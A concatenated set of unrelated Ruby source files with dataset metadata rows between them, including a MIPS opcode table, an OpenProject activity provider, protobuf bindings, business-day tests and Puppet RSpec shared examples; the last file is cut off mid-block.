[:cop1_s, :cop1_d].each do |type|
macro_addop_cop1_precision 'div', type, 0b000011, 'fd, fs, ft'
macro_addop_cop1_precision 'sqrt', type, 0b000100, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'round.w', type, 0b001100, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'trunc.w', type, 0b001101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'ceil.w', type, 0b001110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'floor.w', type, 0b001111, 'fd, fs', :ft_zero
end
# COP2 is not decoded (pretty useless)
[:cop1_d,:cop1_w].each { |type| macro_addop_cop1_precision 'cvt.s', type, 0b100000, 'fd, fs', :ft_zero }
[:cop1_s,:cop1_w].each { |type| macro_addop_cop1_precision 'cvt.d', type, 0b100001, 'fd, fs', :ft_zero }
[:cop1_s,:cop1_d].each { |type| macro_addop_cop1_precision 'cvt.w', type, 0b100100, 'fd, fs', :ft_zero }
[ :normal, :special, :regimm, :special2, :cop0, :cop0_c0, :cop1, :cop1_s,
:cop1_d, :cop1_w ].each \
{ |t| @@opcodes_by_class[t] = opcode_list.find_all { |o| o.type == t } }
end
# Initialize the instruction set with the MIPS32 Instruction Set Release 2
def init_mips64
init_mips32
#SPECIAL
macro_addop_special "rotr", 0b000010, 'rd, rt, sa', :diff_bits, [ 26, 1, 1 ]
macro_addop_special "rotrv", 0b000110, 'rd, rt, rs', :diff_bits, [ 6, 1, 1 ]
# REGIMM
addop "synci", :regimm, 0b11111, '', {:base => [5,21], :off => [16, 0] }
# ---------------------------------------------------------------
# SPECIAL3 opcode encoding of function field
# ---------------------------------------------------------------
addop "ext", :special3, 0b00000, 'rt, rs, pos, size', { :rs => [5, 21], :rt => [5, 16],
:msbd => [5, 11], :lsb => [5, 6] }
addop "ins", :special3, 0b00100, 'rt, rs, pos, size', { :rs => [5, 21], :rt => [5, 16],
:msb => [5, 11], :lsb => [5, 6] }
addop "rdhwr", :special3, 0b111011, 'rt, rd', { :rt => [5, 16], :rd => [5, 11] }
addop "wsbh", :bshfl, 0b00010, 'rd, rt', { :rt => [5, 16], :rd => [5, 11] }
addop "seb", :bshfl, 0b10000, 'rd, rt', { :rt => [5, 16], :rd => [5, 11] }
addop "seh", :bshfl, 0b11000, 'rd, rt', { :rt => [5, 16], :rd => [5, 11] }
# ---------------------------------------------------------------
# COP0
# ---------------------------------------------------------------
addop "rdpgpr", :cop0, 0b01010, 'rt, rd', {:rt => [5, 16], :rd => [5, 11] }
addop "wdpgpr", :cop0, 0b01110, 'rt, rd', {:rt => [5, 16], :rd => [5, 11] }
addop "di", :cop0, 0b01011, '', {}, :diff_bits, [ 5, 1 , 0]
addop "ei", :cop0, 0b01011, '', {}, :diff_bits, [ 5, 1 , 1]
# ---------------------------------------------------------------
# COP1, field rs
# ---------------------------------------------------------------
macro_addop_cop1 "mfhc1", 0b00011
macro_addop_cop1 "mthc1", 0b00111
# Floating point
[:cop1_s, :cop1_d].each do |type|
macro_addop_cop1_precision 'round.l', type, 0b001000, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'trunc.l', type, 0b001001, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'ceil.l', type, 0b001010, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'floor.l', type, 0b001011, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'recip', type, 0b010101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'rsqrt', type, 0b010110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'cvt.l', type, 0b100101, 'fd, fs', :ft_zero
end
macro_addop_cop1_precision 'cvt.ps', :cop1_s, 0b100110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'cvt.s', :cop1_l, 0b100000, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'cvt.d', :cop1_l, 0b100000, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'add', :cop1_ps, 0b000000, 'fd, fs, ft'
macro_addop_cop1_precision 'sub', :cop1_ps, 0b000001, 'fd, fs, ft'
macro_addop_cop1_precision 'mul', :cop1_ps, 0b000010, 'fd, fs, ft'
macro_addop_cop1_precision 'abs', :cop1_ps, 0b000101, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'mov', :cop1_ps, 0b000110, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'neg', :cop1_ps, 0b000111, 'fd, fs', :ft_zero
macro_addop_cop1_precision 'movz', :cop1_ps, 0b010010, 'fd, fs, ft'
macro_addop_cop1_precision 'movn', :cop1_ps, 0b010011, 'fd, fs, ft'
addop "movf.#{:cop1_ps_str}", :cop1_ps, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ]
addop "movt.#{:cop1_ps_str}", :cop1_ps, 0b010001, 'fd, fs, cc', [ :cc, :fs, :fd ]
%w(f un eq ueq olt ult ole ule sf ngle seq ngl lt nge le ngt).each_with_index do |cond, index|
addop "c.#{cond}.ps", :cop1_cond, 0b110000+index, 'cc, fs, ft',
[ :ft, :fs, :cc ]
# TODO: COP1X
[ :special3, :bshfl, :cop1_l, :cop1_ps ].each \
{ |t| @@opcodes_by_class[t] = opcode_list.find_all { |o| o.type == t } }
end
end
# Reset all instructions
def reset
metaprops_allowed.clear
args_allowed.clear
props_allowed.clear
fields_spec.clear
opcode_list.clear
end
end
# Array containing all the supported opcodes
attr_accessor :opcode_list
init_mips32
end
end
| 41.467849 | 202 | 0.576142 |
1845b7cb63a499e3bff81595645fe720e827a7aa | 2,573 | #-- encoding: UTF-8
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2017 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
class Activity::WikiContentActivityProvider < Activity::BaseActivityProvider
acts_as_activity_provider type: 'wiki_edits',
permission: :view_wiki_edits
def extend_event_query(query, activity)
query.join(wiki_pages_table).on(activity_journals_table(activity)[:page_id].eq(wiki_pages_table[:id]))
query.join(wikis_table).on(wiki_pages_table[:wiki_id].eq(wikis_table[:id]))
end
def event_query_projection(_activity)
[
projection_statement(wikis_table, :project_id, 'project_id'),
projection_statement(wiki_pages_table, :title, 'wiki_title')
]
end
def projects_reference_table(_activity)
wikis_table
end
protected
def event_title(event, _activity)
"#{l(:label_wiki_edit)}: #{event['wiki_title']} (##{event['version']})"
end
def event_type(_event, _activity)
'wiki-page'
end
def event_path(event, _activity)
url_helpers.project_wiki_path(*url_helper_parameter(event))
end
def event_url(event, _activity)
url_helpers.project_wiki_url(*url_helper_parameter(event))
end
private
def wiki_pages_table
@wiki_pages_table ||= WikiPage.arel_table
end
def wikis_table
@wikis_table ||= Wiki.arel_table
end
def url_helper_parameter(event)
[event['project_id'], event['wiki_title'], { version: event['version'] }]
end
end
| 31.378049 | 106 | 0.74077 |
f84449900b1cea6bded95918ccc111e85370b5f8 | 2,783 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/vision/v1p3beta1/web_detection.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/vision/v1p3beta1/web_detection.proto", :syntax => :proto3) do
add_message "google.cloud.vision.v1p3beta1.WebDetection" do
repeated :web_entities, :message, 1, "google.cloud.vision.v1p3beta1.WebDetection.WebEntity"
repeated :full_matching_images, :message, 2, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :partial_matching_images, :message, 3, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :pages_with_matching_images, :message, 4, "google.cloud.vision.v1p3beta1.WebDetection.WebPage"
repeated :visually_similar_images, :message, 6, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :best_guess_labels, :message, 8, "google.cloud.vision.v1p3beta1.WebDetection.WebLabel"
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebEntity" do
optional :entity_id, :string, 1
optional :score, :float, 2
optional :description, :string, 3
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebImage" do
optional :url, :string, 1
optional :score, :float, 2
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebPage" do
optional :url, :string, 1
optional :score, :float, 2
optional :page_title, :string, 3
repeated :full_matching_images, :message, 4, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
repeated :partial_matching_images, :message, 5, "google.cloud.vision.v1p3beta1.WebDetection.WebImage"
end
add_message "google.cloud.vision.v1p3beta1.WebDetection.WebLabel" do
optional :label, :string, 1
optional :language_code, :string, 2
end
end
end
module Google
module Cloud
module Vision
module V1p3beta1
WebDetection = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection").msgclass
WebDetection::WebEntity = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebEntity").msgclass
WebDetection::WebImage = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebImage").msgclass
WebDetection::WebPage = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebPage").msgclass
WebDetection::WebLabel = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1p3beta1.WebDetection.WebLabel").msgclass
end
end
end
end
| 52.509434 | 155 | 0.754941 |
4a0229300b8863d38c80882be8d255500511155a | 878 | require 'test_helper'
class I18nTest < ActiveSupport::TestCase
def test_uses_authlogic_as_scope_by_default
assert_equal :authlogic, Authlogic::I18n.scope
end
def test_can_set_scope
assert_nothing_raised { Authlogic::I18n.scope = [:a, :b] }
assert_equal [:a, :b], Authlogic::I18n.scope
Authlogic::I18n.scope = :authlogic
end
def test_uses_built_in_translator_by_default
assert_equal Authlogic::I18n::Translator, Authlogic::I18n.translator.class
end
def test_can_set_custom_translator
old_translator = Authlogic::I18n.translator
assert_nothing_raised do
Authlogic::I18n.translator = Class.new do
def translate(key, _options = {})
"Translated: #{key}"
end
end.new
end
assert_equal "Translated: x", Authlogic::I18n.translate(:x)
Authlogic::I18n.translator = old_translator
end
end
| 25.823529 | 78 | 0.719818 |
6a10341f3248de5dcf76c2dee11aefbd0810472d | 5,870 | # rubocop:disable Style/FrozenStringLiteralComment
require 'conditions_generator_column_string_regexped' # Used to generate simple_search query condition
#
# = SwimmerFuzzyFinder
#
# - Goggles framework vers.: 6.071
# - author: Steve A.
#
# Fuzzy-finder class used to retrieve lists of Swimmer instances based
# upon a versatile "fuzzy" search query.
#
class SwimmerFuzzyFinder
attr_reader :first_name, :last_name, :complete_name, :year_of_birth, :gender_code,
:limit
# Executes the search call.
#
# == Params:
# An Hash-like list of parameter values, specifying the corresponding Swimmer
# field value.
#
# All parameters are optional but at least one must be specified.
# Whenever present, the couple :first_name & :last_name take precedence
# over :complete_name (even though this is the "main" search field).
#
# - :first_name,
# - :last_name,
# - :complete_name (main search field),
# - :year_of_birth (either as String or Fixnum),
# - :gender_type_id (takes precedence over ;gender_code)
# - :gender_code (specifying this will issue an additional query)
# - :limit for the results found
#
# == Returns:
# A list of matching Swimmer instances; an empty array otherwise.
#
def self.call(*args)
new(*args).call
end
# Creates a new finder instance. See self.call() for parameters.
#
def initialize(params)
# These two may be null inside a Swimmer row:
@first_name = params[:first_name]
@last_name = params[:last_name]
# :complete_name is never null in Swimmer and thus is the main search field
@complete_name = params[:complete_name]
@year_of_birth = params[:year_of_birth]
@gender_type_id = params[:gender_type_id]
@gender_code = params[:gender_code]
@limit = params[:limit]
normalize_names
normalize_gender
end
# Executes the search given the stored parameters.
#
def call
filter_by_gender(filter_by_birth(search_by_name))
end
private
# Swimmer name parameter normalizer.
# It assumes that all the variables may be nil.
#
# When either complete_name or the couple last_name & first_name are not nil or
# empty, the result of the normalization is to define a coherent value for all
# 3 fields, assuming that for most DB rows it is expected that:
#
# complete_name = last_name + ' ' + first_name
#
def normalize_names
# When given, last_name & first_name take precendece over complete_name:
if !@first_name.to_s.empty? || !@last_name.to_s.empty?
@complete_name = [@last_name, @first_name].join(' ')
elsif !@complete_name.to_s.empty?
# Normalize multi-space separator between last_name and first_name.
# We must find a "separator length" that at least results in a last_name+first_name
# array:
splitted_name = @complete_name.gsub(/\s{3,}/, ' ').split(' ')
splitted_name = (splitted_name[0]).split(' ') if splitted_name.size < 2
if splitted_name.size == 2 # Use last & first name only when the splitting is certain
@last_name = splitted_name[0]
@first_name = splitted_name.reject { |s| s == @last_name }.join(' ')
end
@complete_name = @complete_name.gsub(/\s+/, ' ')
end
end
# Swimmer gender type parameter normalizer.
# It assumes that all the variables may be nil.
# The result of the normalization is a GenderType.id usable for a WHERE clause.
#
def normalize_gender
@gender_type_id = GenderType::TYPES_HASH.key(@gender_code) if @gender_code
end
#-- --------------------------------------------------------------------------
#++
# Searches swimmers based on possible name matches.
# Returns an array of matching rows; an empty array when no matches are found.
#
def search_by_name
# 1) Simple query, searching for a name "as-is":
swimmers = Swimmer.where(complete_name: @complete_name).limit(@limit)
# 2) RegExp query on name:
if swimmers.count == 0 && !@complete_name.to_s.empty?
# Search among Swimmers for an equal complete name:
name_clause = ConditionsGeneratorColumnStringRegexped
.generate_query_conditions('swimmers', 'complete_name', @complete_name)
swimmers = Swimmer.where(name_clause).limit(@limit)
end
# 3) Fuzzy search on a pre-filtered complete_name
if swimmers.count == 0 && !@complete_name.to_s.empty?
matcher = FuzzyStringMatcher.new(prefilter_by_name_start, :complete_name)
final_bias_score, results = matcher.seek_deep_match(
@complete_name,
FuzzyStringMatcher::BIAS_SCORE_MAX, # Starting target score
FuzzyStringMatcher::BIAS_SCORE_MIN # Min. acceptable score
)
swimmers = results.map { |hash| hash[:row] }
end
swimmers.to_a
end
# (Pre-)Filters Swimmers based on the most significant part of the complete_name.
# Returns the filtered set.
#
def prefilter_by_name_start
search_token = '%' + @complete_name[0..3] + '%'
Swimmer.where('(complete_name LIKE ?)', search_token).limit(@limit)
end
# Filters Swimmers array based on year of birth.
# Returns the filtered array.
#
def filter_by_birth(swimmers_list)
if @year_of_birth
year = @year_of_birth.to_i
swimmers_list.find_all do |s|
(s.year_of_birth == year && !s.is_year_guessed) ||
(year - 4..year + 4).include?(s.year_of_birth)
end
else
swimmers_list
end
end
# Filters Swimmers array based on gender type id.
# Returns the filtered array.
#
def filter_by_gender(swimmers_list)
if @gender_type_id
swimmers_list.find_all { |s| s.gender_type_id == @gender_type_id.to_i }
else
swimmers_list
end
end
#-- --------------------------------------------------------------------------
#++
end
# rubocop:enable Style/FrozenStringLiteralComment
| 34.127907 | 102 | 0.672572 |
111f0a9a715a6677c052d447b41b48d18220ce55 | 11,365 | require File.expand_path('../helper', __FILE__)
describe "business days" do
describe "with a standard Time object" do
describe "when adding/subtracting positive business days" do
it "should move to tomorrow if we add a business day" do
first = Time.parse("April 13th, 2010, 11:00 am")
later = 1.business_day.after(first)
expected = Time.parse("April 14th, 2010, 11:00 am")
assert_equal expected, later
end
it "should take into account the weekend when adding a day" do
first = Time.parse("April 9th, 2010, 12:33 pm")
after = 1.business_day.after(first)
expected = Time.parse("April 12th, 2010, 12:33 pm")
assert_equal expected, after
end
it "should pick next working day when adding zero days on the weekend" do
first = Time.parse("April 10th, 2010, 12:33 pm")
after = 0.business_days.after(first)
expected = Time.parse("April 12th, 2010, 09:00 am")
assert_equal expected, after
end
it "should pick previous working day when subtracting zero days on the weekend" do
first = Time.parse("January 30th, 2016, 12:33 pm")
after = 0.business_days.before(first)
expected = Time.parse("January 29th, 2016, 09:00 am")
assert_equal expected, after
end
it "should move forward one week when adding 5 business days" do
first = Time.parse("April 9th, 2010, 12:33 pm")
after = 5.business_days.after(first)
expected = Time.parse("April 16th, 2010, 12:33 pm")
assert_equal expected, after
end
it "should take into account a holiday when adding a day" do
three_day_weekend = Date.parse("July 5th, 2010")
BusinessTime::Config.holidays << three_day_weekend
friday_afternoon = Time.parse("July 2nd, 2010, 4:50 pm")
tuesday_afternoon = 1.business_day.after(friday_afternoon)
expected = Time.parse("July 6th, 2010, 4:50 pm")
assert_equal expected, tuesday_afternoon
end
it "should take into account a holiday on a weekend" do
july_4 = Date.parse("July 4th, 2010")
BusinessTime::Config.holidays << july_4
friday_afternoon = Time.parse("July 2nd, 2010, 4:50 pm")
monday_afternoon = 1.business_day.after(friday_afternoon)
expected = Time.parse("July 5th, 2010, 4:50 pm")
assert_equal expected, monday_afternoon
end
it "should move to tuesday if we add one business day during a weekend" do
saturday = Time.parse("April 10th, 2010, 11:00 am")
later = 1.business_days.after(saturday)
expected = Time.parse("April 13th, 2010, 9:00 am")
assert_equal expected, later
end
it "should move to tuesday if we add one business day during a weekend outside normal business hours" do
saturday = Time.parse("April 10th, 2010, 11:55 pm")
later = 1.business_days.after(saturday)
expected = Time.parse("April 13th, 2010, 9:00 am")
assert_equal expected, later
end
it "should return a business hour when adding one business day from before business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
later = 1.business_days.after(wednesday)
expected = Time.parse("Thursday October 15th, 2015, 09:00 am")
assert_equal expected, later
end
it "should move to thursday if we subtract one business day during a weekend" do
saturday = Time.parse("April 10th, 2010, 11:00 am")
before = 1.business_days.before(saturday)
expected = Time.parse("April 8th, 2010, 9:00 am")
assert_equal expected, before
end
it "should move to thursday if we subtract one business day during a weekend outside normal business hours" do
saturday = Time.parse("April 10th, 2010, 03:00 am")
before = 1.business_days.before(saturday)
expected = Time.parse("April 8th, 2010, 9:00 am")
assert_equal expected, before
end
it "should return a business hour when adding one business day from after business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
later = 1.business_days.after(wednesday)
expected = Time.parse("Friday October 16th, 2015, 09:00 am")
assert_equal expected, later
end
it "should return a business hour when subtracting one business day from before business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
before = 1.business_days.before(wednesday)
expected = Time.parse("Monday October 12th, 2015, 09:00 am")
assert before.during_business_hours?
assert_equal expected, before
end
it "should return a business hour when subtracting one business day from after business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
before = 1.business_days.before(wednesday)
expected = Time.parse("Tuesday October 13th, 2015, 09:00 am")
assert before.during_business_hours?
assert_equal expected, before
end
it "should move to yesterday is we subtract a business day" do
first = Time.parse("April 13th, 2010, 11:00 am")
before = 1.business_day.before(first)
expected = Time.parse("April 12th, 2010, 11:00 am")
assert_equal expected, before
end
it "should take into account the weekend when subtracting a day" do
first = Time.parse("April 12th, 2010, 12:33 pm")
before = 1.business_day.before(first)
expected = Time.parse("April 9th, 2010, 12:33 pm")
assert_equal expected, before
end
it "should move backward one week when subtracting 5 business days" do
first = Time.parse("April 16th, 2010, 12:33 pm")
before = 5.business_days.before(first)
expected = Time.parse("April 9th, 2010, 12:33 pm")
assert_equal expected, before
end
end
describe "when adding/subtracting negative business days" do
it "should move to yesterday if we add a negative business day" do
first = Time.parse("April 13th, 2010, 11:00 am")
before = -1.business_day.after(first)
expected = Time.parse("April 12th, 2010, 11:00 am")
assert_equal expected, before
end
it "should take into account the weekend when adding a negative day" do
first = Time.parse("April 12th, 2010, 12:33 pm")
before = -1.business_day.after(first)
expected = Time.parse("April 9th, 2010, 12:33 pm")
assert_equal expected, before
end
it "should move bacward one week when adding 5 negative business days" do
first = Time.parse("April 16th, 2010, 12:33 pm")
before = -5.business_days.after(first)
expected = Time.parse("April 9th, 2010, 12:33 pm")
assert_equal expected, before
end
it "should take into account a holiday on a weekend when adding a negative day" do
july_4 = Date.parse("July 4th, 2010")
BusinessTime::Config.holidays << july_4
monday_afternoon = Time.parse("July 5th, 2010, 4:50 pm")
friday_afternoon = -1.business_day.after(monday_afternoon)
expected = Time.parse("July 2nd, 2010, 4:50 pm")
assert_equal expected, friday_afternoon
end
it "should move to thursday if we add one negative business day during weekend" do
saturday = Time.parse("April 10th, 2010, 11:00 am")
before = -1.business_days.after(saturday)
expected = Time.parse("April 8th, 2010, 09:00 am")
assert_equal expected, before
end
it "should return a business hour when adding one negative business day from before business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
before = -1.business_days.after(wednesday)
expected = Time.parse("Monday October 12th, 2015, 09:00 am")
assert_equal expected, before
end
it "should return a business hour when adding one negative business day from after business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
before = -1.business_days.after(wednesday)
expected = Time.parse("Tuesday October 13th, 2015, 09:00 am")
assert_equal expected, before
end
it "should move to tomorrow if we subtract a negative business day" do
first = Time.parse("April 13th, 2010, 11:00 am")
later = -1.business_day.before(first)
expected = Time.parse("April 14th, 2010, 11:00 am")
assert_equal expected, later
end
it "should take into account the weekend when subtracting a negative day" do
first = Time.parse("April 12th, 2010, 12:33 pm")
later = -1.business_day.before(first)
expected = Time.parse("April 13th, 2010, 12:33 pm")
assert_equal expected, later
end
it "should move forward one week when subtracting -5 business days" do
first = Time.parse("April 9th, 2010, 12:33 pm")
later = -5.business_days.before(first)
expected = Time.parse("April 16th, 2010, 12:33 pm")
assert_equal expected, later
end
it "should move to tuesday if we subtract one negative business day during a weekend" do
saturday = Time.parse("April 10th, 2010, 11:00 am")
later = -1.business_days.before(saturday)
expected = Time.parse("April 13th, 2010, 09:00 am")
assert_equal expected, later
end
it "should return a business hour when subtracting one negative business day from before business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 01:54 am")
later = -1.business_days.before(wednesday)
expected = Time.parse("Thurdsay October 15th, 2015, 09:00 am")
assert later.during_business_hours?
assert_equal expected, later
end
it "should return a business hour when subtracting one negative business day from after business hours" do
wednesday = Time.parse("Wednesday October 14th, 2015, 21:54 pm")
after = -1.business_days.before(wednesday)
expected = Time.parse("Friday October 16th, 2015, 09:00 am")
assert after.during_business_hours?
assert_equal expected, after
end
end
it "responds appropriatly to <" do
assert 5.business_days < 10.business_days
assert !(10.business_days < 5.business_days)
assert (-1.business_day < 1.business_day)
assert !(1.business_day < -1.business_day)
end
it "responds appropriatly to >" do
assert !(5.business_days > 10.business_days)
assert 10.business_days > 5.business_days
assert 1.business_day > -1.business_day
assert !(-1.business_day > 1.business_day)
end
it "responds appropriatly to ==" do
assert 5.business_days == 5.business_days
assert 10.business_days != 5.business_days
assert(-1.business_day == -1.business_day)
assert(-1.business_day != -5.business_days)
end
it "won't compare days to hours" do
assert_raises ArgumentError do
5.business_days < 5.business_hours
end
assert_raises ArgumentError do
-5.business_days < 5.business_hours
end
end
end
end
| 42.092593 | 116 | 0.658337 |
61cfb29d964462ca418c663fcc8ab416ffa65031 | 833 | Pod::Spec.new do |s|
s.name = "NXCollectionViewDataSource"
s.version = "1.1.5"
s.summary = "Generic data source for UICollectionView using either static data of a NSFetchRequest."
s.homepage = "https://github.com/nxtbgthng/NXCollectionViewDataSource"
s.license = { :type => 'BSD', :file => 'LICENSE.md' }
s.author = { "Tobias Kräntzer" => "[email protected]" }
s.social_media_url = 'https://twitter.com/nxtbgthng'
s.platform = :ios, '6.0'
s.source = { :git => "https://github.com/nxtbgthng/NXCollectionViewDataSource.git", :tag => "#{s.version}" }
s.source_files = 'NXCollectionViewDataSource/NXCollectionViewDataSource/*.{h,m}'
s.framework = 'CoreData'
s.requires_arc = true
end
| 55.533333 | 123 | 0.594238 |
79c8b51522c48f5129ca39d61bc77ddf1cc5c421 | 1,494 | # coding: utf-8
Gem::Specification.new do |spec|
spec.name = "alembic-jekyll-theme"
spec.version = "3.0.9"
spec.authors = ["David Darnes"]
spec.email = ["[email protected]"]
spec.summary = %q{A Jekyll boilerplate theme designed to be a starting point for any Jekyll website.}
spec.description = "A Jekyll boilerplate theme designed to be a starting point for any Jekyll website. Rather than starting from scratch, this boilerplate is designed to get the ball rolling immediately."
spec.homepage = "https://alembic.darn.es"
spec.license = "MIT"
spec.metadata["plugin_type"] = "theme"
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r{^(assets|_layouts|_includes|_sass|LICENSE|README|sw|manifest)}i) }
spec.add_runtime_dependency "jekyll", "~> 3.8"
spec.add_runtime_dependency "jekyll-sitemap", "~> 0.13"
spec.add_runtime_dependency "jekyll-mentions", "~> 1.2"
spec.add_runtime_dependency "jekyll-paginate", "~> 1.1"
spec.add_runtime_dependency "jekyll-seo-tag", "~> 2.3"
spec.add_runtime_dependency "jekyll-redirect-from", "~> 0.12"
spec.add_runtime_dependency "jekyll-default-layout", "~> 0.1"
spec.add_runtime_dependency "jekyll-feed", "~> 0.9"
spec.add_runtime_dependency "jekyll-commonmark", "~> 1.2"
spec.add_runtime_dependency "jekyll-include-cache", "~> 0.1"
spec.add_runtime_dependency "jemoji", "~> 0.9"
spec.add_development_dependency "bundler", "~> 1.14"
end
| 46.6875 | 208 | 0.691432 |
bf610c7c7b66f263c0e83aa54328d7e109d6e916 | 815 | # Ruby wrapper for Colonel Kurtz data
#
# Contents of `data` hash
#
# type:
# block type
# string, lower-cased and dashed, e.g. "hero-photo"
#
# content:
# block content
# hash
#
# blocks:
# block children
# array of `data` hashes
#
module ColonelKurtz
class Block
attr_reader :parent
def initialize(data)
@data = Data.new(data).to_hash
end
def type
@type ||= Type.new(data.fetch("type")).to_sym
end
def content
@content ||= data.fetch("content", {})
end
def parent
@parent ||= data.fetch("parent", nil)
end
def children
@children ||= blocks.map{ |data| Block.new(data.merge("parent" => self)) }
end
private
attr_reader :data
def blocks
data.fetch("blocks", [])
end
end
end
| 15.377358 | 80 | 0.579141 |
ff1183c9feeac98d78ccdb2be657664748de2304 | 140 | class AddAvailabilityToProperties < ActiveRecord::Migration[6.1]
def change
add_column :properties, :availability, :boolean
end
end
| 23.333333 | 64 | 0.778571 |
bf8d36f66585309128e29a353beeaae40490c726 | 1,233 | # frozen_string_literal: true
class Issue < ApplicationRecord
validates :status, presence: true
validates :problem, presence: true, uniqueness: { scope: :team_id }
validates :team, presence: true
# 状態遷移条件
# unsolved: 未対応
# in_progress: 対応中
# solved: 解決
enum status: {
unsolved: 1,
in_progress: 2,
solved: 3
}
belongs_to :problem
belongs_to :team
has_many :comments, dependent: :destroy, class_name: 'IssueComment'
# staff以外には対応中を未対応と表示する
def response_status(team:)
return 'unsolved' if !team.staff? && in_progress?
status
end
def transition_by_click(team:)
case status
when 'unsolved'
self.status = team.staff? ? 'in_progress' : 'solved'
when 'in_progress'
self.status = 'solved'
when 'solved'
self.status = team.staff? ? 'in_progress' : 'unsolved'
else
raise UnhandledIssueStatus, status
end
end
def transition_by_comment(team:)
case status
when 'unsolved'
self.status = 'in_progress' if team.staff?
when 'in_progress'
self.status = 'unsolved' if team.player?
when 'solved'
self.status = 'unsolved' if team.player?
else
raise UnhandledIssueStatus, status
end
end
end
| 22.418182 | 69 | 0.664234 |
91021deed10e6954a9b73ab9156225c881f3a0d7 | 3,784 | # frozen_string_literal: true
require 'spec_helper'
shared_examples 'generic namevar' do |name|
it { expect(described_class.attrtype(name)).to eq :param }
it 'is the namevar' do
expect(described_class.key_attributes).to eq [name]
end
end
shared_examples 'generic ensurable' do |*allowed|
allowed ||= [:present, :absent, 'present', 'absent']
context 'attrtype' do
it { expect(described_class.attrtype(:ensure)).to eq :property }
end
context 'class' do
it do
expect(described_class.propertybyname(:ensure).ancestors).
to include(Puppet::Property::Ensure)
end
end
it 'defaults to :present' do
expect(described_class.new(name: 'test').should(:ensure)).to eq(:present)
end
allowed.each do |value|
it "supports #{value.inspect} as a value to :ensure" do
expect { described_class.new(name: 'nobody', ensure: value) }.not_to raise_error
end
end
it 'rejects unknown values' do
expect { described_class.new(name: 'nobody', ensure: :foo) }.to raise_error(Puppet::Error)
end
end
shared_examples 'boolean parameter' do |param, _default|
it 'does not allow non-boolean values' do
expect do
described_class.new(:name => 'foo', param => 'unknown')
end.to raise_error Puppet::ResourceError, %r{Valid values are true, false}
end
end
shared_examples 'validated property' do |param, default, allowed, disallowed|
context 'attrtype' do
it { expect(described_class.attrtype(param)).to eq :property }
end
context 'allowed' do
allowed.each do |value|
it "supports #{value} as a value" do
expect { described_class.new(:name => 'nobody', param => value) }.
not_to raise_error
end
end
end
context 'disallowed' do
disallowed&.each do |value|
it "rejects #{value} as a value" do
expect { described_class.new(:name => 'nobody', param => :value) }.
to raise_error(Puppet::Error)
end
end
end
context 'default' do
if default.nil?
it 'has no default value' do
resource = described_class.new(name: 'nobody')
expect(resource.should(param)).to be_nil
end
else
it "defaults to #{default}" do
resource = described_class.new(name: 'nobody')
expect(resource.should(param)).to eq default
end
end
end
end
shared_examples 'array_matching property' do |param, default|
context 'attrtype' do
it { expect(described_class.attrtype(param)).to eq :property }
end
context 'array_matching' do
it { expect(described_class.attrclass(param).array_matching).to eq :all }
end
it 'supports an array of mixed types' do
value = [true, 'foo']
resource = described_class.new(name: 'test', param => value)
expect(resource[param]).to eq value
end
context 'default' do
if default.nil?
it 'has no default value' do
resource = described_class.new(name: 'nobody')
expect(resource.should(param)).to be_nil
end
else
it "defaults to #{default}" do
resource = described_class.new(name: 'nobody')
expect(resource.should(param)).to eq default
end
end
end
end
shared_examples 'boolean property' do |param, default|
